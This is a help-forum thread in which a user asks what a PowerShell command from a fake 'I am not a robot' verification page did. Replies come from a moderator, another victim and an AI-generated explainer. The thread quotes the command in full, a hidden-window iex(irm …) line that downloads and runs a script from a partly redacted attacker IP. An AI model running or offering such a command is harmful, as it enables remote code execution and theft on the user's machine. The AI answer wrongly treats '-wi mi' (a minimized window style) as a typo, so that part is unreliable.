You're lucky in that the final payload (Ellaism.msi) for the chain of scripts has been taken down.
I stupidly ran this powershell prompt
![](data:image/svg+xml, %3Csvg xmlns='http://www.w3.org/2000/svg' height='64' class='font-weight-bold' style='font: 600 30.11764705882353px "SegoeUI", Arial' width='64'%3E%3Ccircle fill='hsl(166.4, 86%, 26%)' cx='32' cy='32' r='32' /%3E%3Ctext x='50%25' y='55%25' dominant-baseline='middle' text-anchor='middle' fill='%23FFF' %3EJ%3C/text%3E%3C/svg%3E)
JDZ
20
Reputation points
I stupidly ran this CMD command and have no idea what it may have done.
powershell -wi mi -EP B -c iex(irm 193.<redacted>:5506/I-AM-NOT-A-ROBOT-VERIFY.txt)
Can someone tell me what exactly this commandmeans? As it says towards the end, I thought I was passing a not a robot link.
Many Thanks
Windows for home | Windows 11 | Security and privacy
{count} votes
-
![](data:image/svg+xml, %3Csvg xmlns='http://www.w3.org/2000/svg' height='64' class='font-weight-bold' style='font: 600 30.11764705882353px "SegoeUI", Arial' width='64'%3E%3Ccircle fill='hsl(198.4, 20%, 29%)' cx='32' cy='32' r='32' /%3E%3Ctext x='50%25' y='55%25' dominant-baseline='middle' text-anchor='middle' fill='%23FFF' %3ELA%3C/text%3E%3C/svg%3E)
Limbonic Art 0 Reputation points2026-02-25T18:36:45.6366667+00:00 Sh*t. I did the same. Windows 10 recovery was successful. But after that chrome browser was not starting, needed reinstalling.
Has Google account password theft increased?
Sign in to comment
Answer accepted by question author
Answer recommended by moderator
-
CrazyKats 14,805 Reputation points Volunteer Moderator2026-02-22T18:23:39.8233333+00:00 Hi JDZ,
Did running that command show
that it did anything? If it did I would
System Restore to before you ran the
Command, if you created a Restore point.
-
JDZ 20 Reputation points
2026-02-22T18:31:48.9166667+00:00 Hey - it opened up a separate blank powershell and closed after a few seconds.I tried to do a system restore but crashes my pc and restarts =(
-
JDZ 20 Reputation points
2026-02-22T18:54:51.75+00:00 Just managed a system restore - fingercrossed!
Sign in to comment -
1 additional answer
Sort by: Most helpful
-
Q&A Assist2026-02-22T18:12:57.0866667+00:00 AI generated content. This question contains an answer created with AI from Q&A Assist. Learn moreThe command you ran is a PowerShell command that executes a script from a remote server. Let's break it down:
-
powershell: This invokes the PowerShell environment. -
-wi mi: This part is not standard and seems to be a typo or misconfiguration. It might be intended to set some parameters, but it’s unclear without context. -
-EP B: This sets the execution policy to Bypass, which allows scripts to run without restrictions. This is often used to run potentially harmful scripts without warning. -
-c: This indicates that the following string is a command to execute. -
iex(irm 193.<redacted>:5506/I-AM-NOT-A-ROBOT-VERIFY.txt): This is the core of the command:
-
iex: This is an alias forInvoke-Expression, which executes the string as a command.-
irm: This is an alias forInvoke-RestMethod, which retrieves content from the specified URL. -
193.<redacted>:5506/I-AM-NOT-A-ROBOT-VERIFY.txt: This is the URL from which the content is being fetched. The content from this URL is then executed as a PowerShell command.
-
In summary, this command fetches a script from a remote server and executes it. This can be very dangerous, as it could potentially run malicious code on your system. If you are concerned about security, it is advisable to run a full antivirus scan and monitor your system for any unusual activity.
References:
-